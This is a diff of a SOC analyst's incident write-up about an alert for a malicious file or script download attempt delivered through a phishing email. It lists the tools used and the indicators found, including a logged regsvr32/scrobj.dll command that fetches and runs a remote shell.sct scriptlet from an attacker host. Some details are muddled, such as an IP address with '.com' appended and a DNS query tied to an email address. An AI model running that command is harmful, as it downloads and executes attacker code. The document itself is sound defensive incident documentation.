Tmitchy/-SOC-Incident-Documentation/investigations/001-Malicious-FileScript-Download-Attempt-Alert.md

 Step-by-step walkthrough of the analysis:
 - Logs/tools reviewed:
    - Log Management Tool: To confirm the connection pattern and frequency.
-   - Endpoint Security (EDR): To check what process on the host initiated the connection.
+   - Endpoint Security (EDR): To check which process on the host initiated the connection.
    - Endpoint Security (EDR): To collect data from the network action, terminal history, and browser history plugins on the host that initiated the connection.
    - DNS logs: To see if the destination IP was reached via a domain lookup or a hardcoded IP.
    - VirusTotal: Checked the reputation of the source IP, associated domain, and the malicious attachment.
 - Indicators found:
    - The source IP address `84.38.130.118` on port `80`, along with the email address `projectmanagement@pm.me`, sent an email to the destination IP address mentioned above.
 The email contained more than 20 words and included a malicious attachment that claimed to be from the project management team.
-   - The EDR (Event Data Recorder) provided crucial information that was identified as **vital** for analysis, along with the specific time and date when this data was flagged.
+   - The EDR(Endpoint detection response) provided crucial information that was identified as **vital** for analysis, along with the specific time and date when this data was flagged.
 This information is essential for understanding the context and circumstances surrounding the event:
        - Feb 04 2025 08:06:42 - Source IP: `84.38.130.118`
        - Feb 04 2025 08:06:08 - `"C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"`
    - A matching DNS query was submitted linking to the source IP: `projectmanagement@pm.me`.